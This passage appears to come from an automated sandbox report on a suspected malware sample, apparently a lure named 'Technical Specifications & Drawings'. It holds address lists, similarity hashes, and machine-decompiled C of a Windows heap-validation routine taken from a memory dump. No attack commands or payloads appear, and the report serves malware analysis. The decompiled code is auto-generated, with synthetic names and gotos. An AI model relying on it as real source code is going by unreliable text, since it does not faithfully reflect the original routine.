                                                  0x01862fb2
                                                  0x01862fb9
                                                  0x00000000
                                                  0x00000000
                                                  0x01862fc3
                                                  0x01862fca
                                                  0x00000000
                                                  0x00000000
                                                  0x01862fd0
                                                  0x01862fd6
                                                  0x01862fd9
                                                  0x01862ff8
                                                  0x01862ffd
                                                  0x01862fdb
                                                  0x01862ff0
                                                  0x01862ff5
                                                  0x0186300e
                                                  0x0186300f
                                                  0x0186301a
                                                  0x00000000
                                                  0x01862f29
                                                  0x01862f29
                                                  0x01862f2c
                                                  0x01862f4b
                                                  0x01862f50
                                                  0x01862f2e
                                                  0x01862f43
                                                  0x01862f48
                                                  0x01862f56
                                                  0x01862f64
                                                  0x01862f6c
                                                  0x01862f6c
                                                  0x01862f72
                                                  0x01862f76
                                                  0x01862f7c
                                                  0x01862f83
                                                  0x01862f89
                                                  0x01862f8a
                                                  0x01862f8a
                                                  0x00000000
                                                  0x01862f76
                                                  0x01862f27
                                                  0x01862e6d
                                                  0x01862da6
                                                  0x01862dab
                                                  0x01862db3
                                                  0x01862db9
                                                  0x018630bc
                                                  0x018630c1
                                                  0x018630c1

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                  • API String ID: 3446177414-1745908468
                                                  • Opcode ID: 9f81fabfda7ad74e29f09d4fea4c01c01b44b1987171330741c3e2ea5c9633a3
                                                  • Instruction ID: 292fb589af78a939538a7c6a9b44ff80baafec7cce12f4c84de098d5ef515fc0
                                                  • Opcode Fuzzy Hash: 9f81fabfda7ad74e29f09d4fea4c01c01b44b1987171330741c3e2ea5c9633a3
                                                  • Instruction Fuzzy Hash: E8912230500645DFDB22DF68C494AADFBF6FF58714F18819DE54ADB252C7329A45CB02
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 01864AEF Relevance: 11.8, Strings: 9, Instructions: 529COMMONCrypto
                                                  Download Yara Rule
                                                  C-Code - Quality: 59%
                                                  			E01864AEF(void* __ecx, signed int __edx, intOrPtr* _a8, signed int* _a12, signed int* _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v6;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t189;
				intOrPtr _t191;
				intOrPtr _t210;
				signed int _t225;
				signed char _t231;
				intOrPtr _t232;
				unsigned int _t245;
				intOrPtr _t249;
				intOrPtr _t259;
				signed int _t281;
				signed int _t283;
				intOrPtr _t284;
				signed int _t288;
				signed int* _t294;
				signed int* _t298;
				intOrPtr* _t299;
				intOrPtr* _t300;
				signed int _t307;
				signed int _t309;
				signed short _t312;
				signed short _t315;
				signed int _t317;
				signed int _t320;
				signed int _t322;
				signed int _t326;
				signed int _t327;
				void* _t328;
				signed int _t332;
				signed int _t340;
				signed int _t342;
				signed char _t344;
				signed int* _t345;
				void* _t346;
				signed char _t352;
				signed char _t367;
				signed int _t374;
				intOrPtr* _t378;
				signed int _t380;
				signed int _t385;
				signed char _t390;
				unsigned int _t392;
				signed char _t395;
				unsigned int _t397;
				intOrPtr* _t400;
				signed int _t402;
				signed int _t405;
				intOrPtr* _t406;
				signed int _t407;
				intOrPtr _t412;
				void* _t414;
				signed int _t415;
				signed int _t416;
				signed int _t429;

				_v16 = _v16 & 0x00000000;
				_t189 = 0;
				_v8 = _v8 & 0;
				_t332 = __edx;
				_v12 = 0;
				_t414 = __ecx;
				_t415 = __edx;
				if(__edx >=  *((intOrPtr*)(__edx + 0x28))) {
					L88:
					_t416 = _v16;
					if( *((intOrPtr*)(_t332 + 0x2c)) == _t416) {
						__eflags =  *((intOrPtr*)(_t332 + 0x30)) - _t189;
						if( *((intOrPtr*)(_t332 + 0x30)) == _t189) {
							L107:
							return 1;
						}
						_t191 =  *[fs:0x30];
						__eflags =  *(_t191 + 0xc);
						if( *(_t191 + 0xc) == 0) {
							_push("HEAP: ");
							E017AB150();
						} else {
							E017AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push(_v12);
						_push( *((intOrPtr*)(_t332 + 0x30)));
						_push(_t332);
						_push("Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)\n");
						L122:
						E017AB150();
						L119:
						return 0;
					}
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E017AB150();
					} else {
						E017AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push(_t416);
					_push( *((intOrPtr*)(_t332 + 0x2c)));
					_push(_t332);
					_push("Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)\n");
					goto L122;
				} else {
					goto L1;
				}
				do {
					L1:
					 *_a16 = _t415;
					if( *(_t414 + 0x4c) != 0) {
						_t392 =  *(_t414 + 0x50) ^  *_t415;
						 *_t415 = _t392;
						_t352 = _t392 >> 0x00000010 ^ _t392 >> 0x00000008 ^ _t392;
						_t424 = _t392 >> 0x18 - _t352;
						if(_t392 >> 0x18 != _t352) {
							_push(_t352);
							E0185FA2B(_t332, _t414, _t415, _t414, _t415, _t424);
						}
					}
					if(_v8 != ( *(_t415 + 4) ^  *(_t414 + 0x54))) {
						_t210 =  *[fs:0x30];
						__eflags =  *(_t210 + 0xc);
						if( *(_t210 + 0xc) == 0) {
							_push("HEAP: ");
							E017AB150();
						} else {
							E017AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push(_v8 & 0x0000ffff);
						_t340 =  *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff;
						__eflags = _t340;
						_push(_t340);
						E017AB150("Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)\n", _t415);
						L117:
						__eflags =  *(_t414 + 0x4c);
						if( *(_t414 + 0x4c) != 0) {
							 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
							 *_t415 =  *_t415 ^  *(_t414 + 0x50);
							__eflags =  *_t415;
						}
						goto L119;
					}
					_t225 =  *_t415 & 0x0000ffff;
					_t390 =  *(_t415 + 2);
					_t342 = _t225;
					_v8 = _t342;
					_v20 = _t342;
					_v28 = _t225 << 3;
					if((_t390 & 0x00000001) == 0) {
						__eflags =  *(_t414 + 0x40) & 0x00000040;
						_t344 = (_t342 & 0xffffff00 | ( *(_t414 + 0x40) & 0x00000040) != 0x00000000) & _t390 >> 0x00000002;
						__eflags = _t344 & 0x00000001;
						if((_t344 & 0x00000001) == 0) {
							L66:
							_t345 = _a12;
							 *_a8 =  *_a8 + 1;
							 *_t345 =  *_t345 + ( *_t415 & 0x0000ffff);
							__eflags =  *_t345;
							L67:
							_t231 =  *(_t415 + 6);
							if(_t231 == 0) {
								_t346 = _t414;
							} else {
								_t346 = (_t415 & 0xffff0000) - ((_t231 & 0x000000ff) << 0x10) + 0x10000;
							}
							if(_t346 != _t332) {
								_t232 =  *[fs:0x30];
								__eflags =  *(_t232 + 0xc);
								if( *(_t232 + 0xc) == 0) {
									_push("HEAP: ");
									E017AB150();
								} else {
									E017AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push( *(_t415 + 6) & 0x000000ff);
								_push(_t415);
								_push("Heap block at %p has incorrect segment offset (%x)\n");
								goto L95;
							} else {
								if( *((char*)(_t415 + 7)) != 3) {
									__eflags =  *(_t414 + 0x4c);
									if( *(_t414 + 0x4c) != 0) {
										 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
										 *_t415 =  *_t415 ^  *(_t414 + 0x50);
										__eflags =  *_t415;
									}
									_t415 = _t415 + _v28;
									__eflags = _t415;
									goto L86;
								}
								_t245 =  *(_t415 + 0x1c);
								if(_t245 == 0) {
									_t395 =  *_t415 & 0x0000ffff;
									_v6 = _t395 >> 8;
									__eflags = _t415 + _t395 * 8 -  *((intOrPtr*)(_t332 + 0x28));
									if(_t415 + _t395 * 8 ==  *((intOrPtr*)(_t332 + 0x28))) {
										__eflags =  *(_t414 + 0x4c);
										if( *(_t414 + 0x4c) != 0) {
											 *(_t415 + 3) =  *(_t415 + 2) ^ _v6 ^ _t395;
											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
											__eflags =  *_t415;
										}
										goto L107;
									}
									_t249 =  *[fs:0x30];
									__eflags =  *(_t249 + 0xc);
									if( *(_t249 + 0xc) == 0) {
										_push("HEAP: ");
										E017AB150();
									} else {
										E017AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									}
									_push( *((intOrPtr*)(_t332 + 0x28)));
									_push(_t415);
									_push("Heap block at %p is not last block in segment (%p)\n");
									L95:
									E017AB150();
									goto L117;
								}
								_v12 = _v12 + 1;
								_v16 = _v16 + (_t245 >> 0xc);
								if( *(_t414 + 0x4c) != 0) {
									 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
									 *_t415 =  *_t415 ^  *(_t414 + 0x50);
								}
								_t415 = _t415 + 0x20 +  *(_t415 + 0x1c);
								if(_t415 ==  *((intOrPtr*)(_t332 + 0x28))) {
									L82:
									_v8 = _v8 & 0x00000000;
									goto L86;
								} else {
									if( *(_t414 + 0x4c) != 0) {
										_t397 =  *(_t414 + 0x50) ^  *_t415;
										 *_t415 = _t397;
										_t367 = _t397 >> 0x00000010 ^ _t397 >> 0x00000008 ^ _t397;
										_t442 = _t397 >> 0x18 - _t367;
										if(_t397 >> 0x18 != _t367) {
											_push(_t367);
											E0185FA2B(_t332, _t414, _t415, _t414, _t415, _t442);
										}
									}
									if( *(_t414 + 0x54) !=  *(_t415 + 4)) {
										_t259 =  *[fs:0x30];
										__eflags =  *(_t259 + 0xc);
										if( *(_t259 + 0xc) == 0) {
											_push("HEAP: ");
											E017AB150();
										} else {
											E017AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push( *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff);
										_push(_t415);
										_push("Heap block at %p has corrupted PreviousSize (%lx)\n");
										goto L95;
									} else {
										if( *(_t414 + 0x4c) != 0) {
											 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
										}
										goto L82;
									}
								}
							}
						}
						_t281 = _v28 + 0xfffffff0;
						_v24 = _t281;
						__eflags = _t390 & 0x00000002;
						if((_t390 & 0x00000002) != 0) {
							__eflags = _t281 - 4;
							if(_t281 > 4) {
								_t281 = _t281 - 4;
								__eflags = _t281;
								_v24 = _t281;
							}
						}
						__eflags = _t390 & 0x00000008;
						if((_t390 & 0x00000008) == 0) {
							_t102 = _t415 + 0x10; // -8
							_t283 = E017FD540(_t102, _t281, 0xfeeefeee);
							_v20 = _t283;
							__eflags = _t283 - _v24;
							if(_t283 != _v24) {
								_t284 =  *[fs:0x30];
								__eflags =  *(_t284 + 0xc);
								if( *(_t284 + 0xc) == 0) {
									_push("HEAP: ");
									E017AB150();
								} else {
									E017AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_t288 = _v20 + 8 + _t415;
								__eflags = _t288;
								_push(_t288);
								_push(_t415);
								_push("Free Heap block %p modified at %p after it was freed\n");
								goto L95;
							}
							goto L66;
						} else {
							_t374 =  *(_t415 + 8);
							_t400 =  *((intOrPtr*)(_t415 + 0xc));
							_v24 = _t374;
							_v28 = _t400;
							_t294 =  *(_t374 + 4);
							__eflags =  *_t400 - _t294;
							if( *_t400 != _t294) {
								L64:
								_push(_t374);
								_push( *_t400);
								_t101 = _t415 + 8; // -16
								E0186A80D(_t414, 0xd, _t101, _t294);
								goto L86;
							}
							_t56 = _t415 + 8; // -16
							__eflags =  *_t400 - _t56;
							_t374 = _v24;
							if( *_t400 != _t56) {
								goto L64;
							}
							 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) - _v20;
							_t402 =  *(_t414 + 0xb4);
							__eflags = _t402;
							if(_t402 == 0) {
								L35:
								_t298 = _v28;
								 *_t298 = _t374;
								 *(_t374 + 4) = _t298;
								__eflags =  *(_t415 + 2) & 0x00000008;
								if(( *(_t415 + 2) & 0x00000008) == 0) {
									L39:
									_t377 =  *_t415 & 0x0000ffff;
									_t299 = _t414 + 0xc0;
									_v28 =  *_t415 & 0x0000ffff;
									 *(_t415 + 2) = 0;
									 *((char*)(_t415 + 7)) = 0;
									__eflags =  *(_t414 + 0xb4);
									if( *(_t414 + 0xb4) == 0) {
										_t378 =  *_t299;
									} else {
										_t378 = E017CE12C(_t414, _t377);
										_t299 = _t414 + 0xc0;
									}
									__eflags = _t299 - _t378;
									if(_t299 == _t378) {
										L51:
										_t300 =  *((intOrPtr*)(_t378 + 4));
										__eflags =  *_t300 - _t378;
										if( *_t300 != _t378) {
											_push(_t378);
											_push( *_t300);
											__eflags = 0;
											E0186A80D(0, 0xd, _t378, 0);
										} else {
											_t87 = _t415 + 8; // -16
											_t406 = _t87;
											 *_t406 = _t378;
											 *((intOrPtr*)(_t406 + 4)) = _t300;
											 *_t300 = _t406;
											 *((intOrPtr*)(_t378 + 4)) = _t406;
										}
										 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) + ( *_t415 & 0x0000ffff);
										_t405 =  *(_t414 + 0xb4);
										__eflags = _t405;
										if(_t405 == 0) {
											L61:
											__eflags =  *(_t414 + 0x4c);
											if(__eflags != 0) {
												 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
												 *_t415 =  *_t415 ^  *(_t414 + 0x50);
											}
											goto L86;
										} else {
											_t380 =  *_t415 & 0x0000ffff;
											while(1) {
												__eflags = _t380 -  *((intOrPtr*)(_t405 + 4));
												if(_t380 <  *((intOrPtr*)(_t405 + 4))) {
													break;
												}
												_t307 =  *_t405;
												__eflags = _t307;
												if(_t307 == 0) {
													_t309 =  *((intOrPtr*)(_t405 + 4)) - 1;
													L60:
													_t94 = _t415 + 8; // -16
													E017CE4A0(_t414, _t405, 1, _t94, _t309, _t380);
													goto L61;
												}
												_t405 = _t307;
											}
											_t309 = _t380;
											goto L60;
										}
									} else {
										_t407 =  *(_t414 + 0x4c);
										while(1) {
											__eflags = _t407;
											if(_t407 == 0) {
												_t312 =  *(_t378 - 8) & 0x0000ffff;
											} else {
												_t315 =  *(_t378 - 8);
												_t407 =  *(_t414 + 0x4c);
												__eflags = _t315 & _t407;
												if((_t315 & _t407) != 0) {
													_t315 = _t315 ^  *(_t414 + 0x50);
													__eflags = _t315;
												}
												_t312 = _t315 & 0x0000ffff;
											}
											__eflags = _v28 - (_t312 & 0x0000ffff);
											if(_v28 <= (_t312 & 0x0000ffff)) {
												goto L51;
											}
											_t378 =  *_t378;
											__eflags = _t414 + 0xc0 - _t378;
											if(_t414 + 0xc0 != _t378) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
								}
								_t317 = E017CA229(_t414, _t415);
								__eflags = _t317;
								if(_t317 != 0) {
									goto L39;
								}
								E017CA309(_t414, _t415,  *_t415 & 0x0000ffff, 1);
								goto L86;
							}
							_t385 =  *_t415 & 0x0000ffff;
							while(1) {
								__eflags = _t385 -  *((intOrPtr*)(_t402 + 4));
								if(_t385 <  *((intOrPtr*)(_t402 + 4))) {
									break;
								}
								_t320 =  *_t402;
								__eflags = _t320;
								if(_t320 == 0) {
									_t322 =  *((intOrPtr*)(_t402 + 4)) - 1;
									L34:
									_t63 = _t415 + 8; // -16
									E017CBC04(_t414, _t402, 1, _t63, _t322, _t385);
									_t374 = _v24;
									goto L35;
								}
								_t402 = _t320;
							}
							_t322 = _t385;
							goto L34;
						}
					}
					if(_a20 == 0) {
						L18:
						if(( *(_t415 + 2) & 0x00000004) == 0) {
							goto L67;
						}
						if(E018523E3(_t414, _t415) == 0) {
							goto L117;
						}
						goto L67;
					} else {
						if((_t390 & 0x00000002) == 0) {
							_t326 =  *(_t415 + 3) & 0x000000ff;
						} else {
							_t328 = E017A1F5B(_t415);
							_t342 = _v20;
							_t326 =  *(_t328 + 2) & 0x0000ffff;
						}
						_t429 = _t326;
						if(_t429 == 0) {
							goto L18;
						}
						if(_t429 >= 0) {
							__eflags = _t326 & 0x00000800;
							if(__eflags != 0) {
								goto L18;
							}
							__eflags = _t326 -  *((intOrPtr*)(_t414 + 0x84));
							if(__eflags >= 0) {
								goto L18;
							}
							_t412 = _a20;
							_t327 = _t326 & 0x0000ffff;
							L17:
							 *((intOrPtr*)(_t412 + _t327 * 4)) =  *((intOrPtr*)(_t412 + _t327 * 4)) + _t342;
							goto L18;
						}
						_t327 = _t326 & 0x00007fff;
						if(_t327 >= 0x81) {
							goto L18;
						}
						_t412 = _a24;
						goto L17;
					}
					L86:
				} while (_t415 <  *((intOrPtr*)(_t332 + 0x28)));
				_t189 = _v12;
				goto L88;
			}



































































                                                  0x01864af7
                                                  0x01864afb
                                                  0x01864afd
                                                  0x01864b01
                                                  0x01864b03
                                                  0x01864b08
                                                  0x01864b0a
                                                  0x01864b0f
                                                  0x01864eb5
                                                  0x01864eb5
                                                  0x01864ebb
                                                  0x018650d5
                                                  0x018650d8
                                                  0x01864ff6
                                                  0x00000000
                                                  0x01864ff6
                                                  0x018650de
                                                  0x018650e4
                                                  0x018650e8
                                                  0x01865107
                                                  0x0186510c
                                                  0x018650ea
                                                  0x018650ff
                                                  0x01865104
                                                  0x01865112
                                                  0x01865115
                                                  0x01865118
                                                  0x01865119
                                                  0x018650cb
                                                  0x018650cb
                                                  0x018650af
                                                  0x00000000
                                                  0x018650af
                                                  0x01864ecb
                                                  0x018650b6
                                                  0x018650bb
                                                  0x01864ed1
                                                  0x01864ee6
                                                  0x01864eeb
                                                  0x018650c1
                                                  0x018650c2
                                                  0x018650c5
                                                  0x018650c6
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x01864b15
                                                  0x01864b15
                                                  0x01864b1c
                                                  0x01864b1e
                                                  0x01864b23
                                                  0x01864b27
                                                  0x01864b33
                                                  0x01864b38
                                                  0x01864b3a
                                                  0x01864b3c
                                                  0x01864b41
                                                  0x01864b41
                                                  0x01864b3a
                                                  0x01864b52
                                                  0x01865045
                                                  0x0186504b
                                                  0x0186504f
                                                  0x0186506e
                                                  0x01865073
                                                  0x01865051
                                                  0x01865066
                                                  0x0186506b
                                                  0x01865083
                                                  0x01865088
                                                  0x01865088
                                                  0x0186508a
                                                  0x01865091
                                                  0x01865099
                                                  0x01865099
                                                  0x0186509d
                                                  0x018650a7
                                                  0x018650ad
                                                  0x018650ad
                                                  0x018650ad
                                                  0x00000000
                                                  0x0186509d
                                                  0x01864b58
                                                  0x01864b5b
                                                  0x01864b5e
                                                  0x01864b63
                                                  0x01864b66
                                                  0x01864b69
                                                  0x01864b6f
                                                  0x01864be4
                                                  0x01864bf0
                                                  0x01864bf2
                                                  0x01864bf5
                                                  0x01864dc3
                                                  0x01864dc6
                                                  0x01864dc9
                                                  0x01864dce
                                                  0x01864dce
                                                  0x01864dd0
                                                  0x01864dd0
                                                  0x01864dd5
                                                  0x01864def
                                                  0x01864dd7
                                                  0x01864de7
                                                  0x01864de7
                                                  0x01864df3
                                                  0x01865001
                                                  0x01865007
                                                  0x0186500b
                                                  0x0186502a
                                                  0x0186502f
                                                  0x0186500d
                                                  0x01865022
                                                  0x01865027
                                                  0x01865039
                                                  0x0186503a
                                                  0x0186503b
                                                  0x00000000
                                                  0x01864df9
                                                  0x01864dfd
                                                  0x01864e90
                                                  0x01864e94
                                                  0x01864e9e
                                                  0x01864ea4
                                                  0x01864ea4
                                                  0x01864ea4
                                                  0x01864ea6
                                                  0x01864ea6
                                                  0x00000000
                                                  0x01864ea6
                                                  0x01864e03
                                                  0x01864e08
                                                  0x01864f88
                                                  0x01864f92
                                                  0x01864f99
                                                  0x01864f9c
                                                  0x01864fe0
                                                  0x01864fe4
                                                  0x01864fee
                                                  0x01864ff4
                                                  0x01864ff4
                                                  0x01864ff4
                                                  0x00000000
                                                  0x01864fe4
                                                  0x01864f9e
                                                  0x01864fa4
                                                  0x01864fa8
                                                  0x01864fc7
                                                  0x01864fcc
                                                  0x01864faa
                                                  0x01864fbf
                                                  0x01864fc4
                                                  0x01864fd2
                                                  0x01864fd5
                                                  0x01864fd6
                                                  0x01864f34
                                                  0x01864f34
                                                  0x00000000
                                                  0x01864f39
                                                  0x01864e0e
                                                  0x01864e14
                                                  0x01864e1b
                                                  0x01864e25
                                                  0x01864e2b
                                                  0x01864e2b
                                                  0x01864e33
                                                  0x01864e38
                                                  0x01864e8a
                                                  0x01864e8a
                                                  0x00000000
                                                  0x01864e3a
                                                  0x01864e3e
                                                  0x01864e43
                                                  0x01864e47
                                                  0x01864e53
                                                  0x01864e58
                                                  0x01864e5a
                                                  0x01864e5c
                                                  0x01864e61
                                                  0x01864e61
                                                  0x01864e5a
                                                  0x01864e6e
                                                  0x01864f41
                                                  0x01864f47
                                                  0x01864f4b
                                                  0x01864f6a
                                                  0x01864f6f
                                                  0x01864f4d
                                                  0x01864f62
                                                  0x01864f67
                                                  0x01864f7f
                                                  0x01864f80
                                                  0x01864f81
                                                  0x00000000
                                                  0x01864e74
                                                  0x01864e78
                                                  0x01864e82
                                                  0x01864e88
                                                  0x01864e88
                                                  0x00000000
                                                  0x01864e78
                                                  0x01864e6e
                                                  0x01864e38
                                                  0x01864df3
                                                  0x01864bfe
                                                  0x01864c01
                                                  0x01864c04
                                                  0x01864c07
                                                  0x01864c09
                                                  0x01864c0c
                                                  0x01864c0e
                                                  0x01864c0e
                                                  0x01864c11
                                                  0x01864c11
                                                  0x01864c0c
                                                  0x01864c14
                                                  0x01864c17
                                                  0x01864dae
                                                  0x01864db2
                                                  0x01864db7
                                                  0x01864dba
                                                  0x01864dbd
                                                  0x01864ef1
                                                  0x01864ef7
                                                  0x01864efb
                                                  0x01864f1a
                                                  0x01864f1f
                                                  0x01864efd
                                                  0x01864f12
                                                  0x01864f17
                                                  0x01864f2b
                                                  0x01864f2b
                                                  0x01864f2d
                                                  0x01864f2e
                                                  0x01864f2f
                                                  0x00000000
                                                  0x01864f2f
                                                  0x00000000
                                                  0x01864c1d
                                                  0x01864c1d
                                                  0x01864c20
                                                  0x01864c23
                                                  0x01864c26
                                                  0x01864c29
                                                  0x01864c2c
                                                  0x01864c2e
                                                  0x01864d91
                                                  0x01864d91
                                                  0x01864d92
                                                  0x01864d97
                                                  0x01864d9e
                                                  0x00000000
                                                  0x01864d9e
                                                  0x01864c34
                                                  0x01864c37
                                                  0x01864c39
                                                  0x01864c3c
                                                  0x00000000
                                                  0x00000000
                                                  0x01864c45
                                                  0x01864c48
                                                  0x01864c4e
                                                  0x01864c50
                                                  0x01864c78
                                                  0x01864c78
                                                  0x01864c7b
                                                  0x01864c7d
                                                  0x01864c80
                                                  0x01864c84
                                                  0x01864cad
                                                  0x01864cad
                                                  0x01864cb0
                                                  0x01864cb8
                                                  0x01864cbb
                                                  0x01864cbe
                                                  0x01864cc1
                                                  0x01864cc7
                                                  0x01864cdc
                                                  0x01864cc9
                                                  0x01864cd2
                                                  0x01864cd4
                                                  0x01864cd4
                                                  0x01864cde
                                                  0x01864ce0
                                                  0x01864d13
                                                  0x01864d13
                                                  0x01864d16
                                                  0x01864d18
                                                  0x01864d29
                                                  0x01864d2a
                                                  0x01864d2c
                                                  0x01864d34
                                                  0x01864d1a
                                                  0x01864d1a
                                                  0x01864d1a
                                                  0x01864d1d
                                                  0x01864d1f
                                                  0x01864d22
                                                  0x01864d24
                                                  0x01864d24
                                                  0x01864d3c
                                                  0x01864d3f
                                                  0x01864d45
                                                  0x01864d47
                                                  0x01864d6c
                                                  0x01864d6c
                                                  0x01864d70
                                                  0x01864d7e
                                                  0x01864d84
                                                  0x01864d84
                                                  0x00000000
                                                  0x01864d49
                                                  0x01864d49
                                                  0x01864d56
                                                  0x01864d56
                                                  0x01864d59
                                                  0x00000000
                                                  0x00000000
                                                  0x01864d4e
                                                  0x01864d50
                                                  0x01864d52
                                                  0x01864d8e
                                                  0x01864d5d
                                                  0x01864d5f
                                                  0x01864d67
                                                  0x00000000
                                                  0x01864d67
                                                  0x01864d54
                                                  0x01864d54
                                                  0x01864d5b
                                                  0x00000000
                                                  0x01864d5b
                                                  0x01864ce2
                                                  0x01864ce2
                                                  0x01864ce5
                                                  0x01864ce5
                                                  0x01864ce7
                                                  0x01864cfb
                                                  0x01864ce9
                                                  0x01864ce9
                                                  0x01864cec
                                                  0x01864cef
                                                  0x01864cf1
                                                  0x01864cf3
                                                  0x01864cf3
                                                  0x01864cf3
                                                  0x01864cf6
                                                  0x01864cf6
                                                  0x01864d02
                                                  0x01864d05
                                                  0x00000000
                                                  0x00000000
                                                  0x01864d07
                                                  0x01864d0f
                                                  0x01864d11
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x01864d11
                                                  0x00000000
                                                  0x01864ce5
                                                  0x01864ce0
                                                  0x01864c8a
                                                  0x01864c8f
                                                  0x01864c91
                                                  0x00000000
                                                  0x00000000
                                                  0x01864c9d
                                                  0x00000000
                                                  0x01864c9d
                                                  0x01864c52
                                                  0x01864c5f
                                                  0x01864c5f
                                                  0x01864c62
                                                  0x00000000
                                                  0x00000000
                                                  0x01864c57
                                                  0x01864c59
                                                  0x01864c5b
                                                  0x01864caa
                                                  0x01864c66
                                                  0x01864c68
                                                  0x01864c70
                                                  0x01864c75
                                                  0x00000000
                                                  0x01864c75
                                                  0x01864c5d
                                                  0x01864c5d
                                                  0x01864c64
                                                  0x00000000
                                                  0x01864c64
                                                  0x01864c17
                                                  0x01864b75
                                                  0x01864bc4
                                                  0x01864bc8
                                                  0x00000000
                                                  0x00000000
                                                  0x01864bd9
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x01864b77
                                                  0x01864b7a
                                                  0x01864b8c
                                                  0x01864b7c
                                                  0x01864b7e
                                                  0x01864b83
                                                  0x01864b86
                                                  0x01864b86
                                                  0x01864b90
                                                  0x01864b93
                                                  0x00000000
                                                  0x00000000
                                                  0x01864b95
                                                  0x01864bab
                                                  0x01864bb0
                                                  0x00000000
                                                  0x00000000
                                                  0x01864bb2
                                                  0x01864bb9
                                                  0x00000000
                                                  0x00000000
                                                  0x01864bbb
                                                  0x01864bbe
                                                  0x01864bc1
                                                  0x01864bc1
                                                  0x00000000
                                                  0x01864bc1
                                                  0x01864b97
                                                  0x01864ba4
                                                  0x00000000
                                                  0x00000000
                                                  0x01864ba6
                                                  0x00000000
                                                  0x01864ba6
                                                  0x01864ea9
                                                  0x01864ea9
                                                  0x01864eb2
                                                  0x00000000

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                  • API String ID: 0-3591852110
                                                  • Opcode ID: e828764a211f0ca3c048cf6409b868bb3a65dfe16ce4a81dd03b57e0ff534d1b
                                                  • Instruction ID: ee822b81b2ecba2472eadd9b1d5136f89a94bb5fa146fb5ecd27f58e79feaf1b
                                                  • Opcode Fuzzy Hash: e828764a211f0ca3c048cf6409b868bb3a65dfe16ce4a81dd03b57e0ff534d1b
                                                  • Instruction Fuzzy Hash: 7312FC70600646EFDB29CF69C498BBAFBE9FF48314F148559E486CB641D734EA80CB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 01864496 Relevance: 10.4, Strings: 8, Instructions: 417COMMONCrypto
                                                  Download Yara Rule
                                                  C-Code - Quality: 56%
                                                  			E01864496(signed int* __ecx, void* __edx) {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed char _v24;
